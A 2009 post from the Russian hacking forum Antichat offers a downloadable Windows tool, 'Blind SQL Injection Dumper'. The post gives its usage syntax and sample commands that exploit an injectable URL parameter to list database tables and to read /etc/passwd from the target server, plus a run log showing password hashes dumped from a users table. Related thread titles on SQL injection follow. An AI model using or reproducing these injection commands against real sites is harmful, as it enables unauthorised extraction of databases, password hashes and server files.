ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
Перезагрузить страницу Blind SQL Injection Dumper
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Blind SQL Injection Dumper
  #1  
Старый 31.10.2009, 03:22
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию Blind SQL Injection Dumper
Blind SQL Injection Dumper v1.1 (Win32 Console)


По мотивам https://forum.antichat.ru/showpost.php?p=1494443&postcount=11

[Описание]
1. Возникает сложность при использовании большой и сложной конструкции запроса, особенно при переборе с использованием LIMIT.
Утилита с ключом -q позволяет автоматизировать этот процесс.
На вход подаете SQL запрос к какой нибудь таблице, прога добавляет условно бесконечный LIMIT на выходе получаете дамп на консоли и в файле.
2. При чтении файла данным способом вывод ограничивается 64 символами.
Утилита с ключом -f позволяет автоматизировать этот процесс и дампить файл блоками по 64 символа.
На вход подаете полный путь до файла который нужно сдампить с целевого хоста, на выходе получаете дамп в файле.


[Синтаксис]
Цитата:
BlindSQLiDumper.exe [full path whith vuln param] -[q,f [param]] [file out(default result.txt)]
param:
-q ["sql query to unlimit repeat"]
-f [full path to filename for download]
Пример для дампа данных:
Цитата:
BlindSQLiDumper.exe test.com /forum/index.php?id=-123' -q "select table_name from information_schema.tables" tables.txt
Пример для дампа файла:
Код:
BlindSQLiDumper.exe test.com /forum/index.php?id=-123' -f /etc/passwd passwd

Особенности:
1. Имя хоста без http://
2. SQL запрос обязательно в кавычках.
3. По умолчанию создается файл result.txt в текущей дире.
4. Имя файла без кавычек, т.к. автоматически преобразует в hex эвивалент.
5. Естественно необходим file_priv = Y

[Лог работы]
Цитата:
========================
Blind SQL Injection Dumper
by [53x]Shadow for Antichat.ru
Based on Qwazar Fast Blind SQL Injection Method
Need MySQL version >= 5.0.*
========================

start...
sql query: select password from users
query result:
358fa3824cfe5ac363f5ec254eafff57
acd455efd4541bf9b2e05f895c957e83
Dump stopped!
Вложения
Тип файла: rar BlindSQLiDumper.rar (53.4 Кб, 35 просмотров)
Последний раз редактировалось [53x]Shadow; 21.11.2009 в 17:14..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ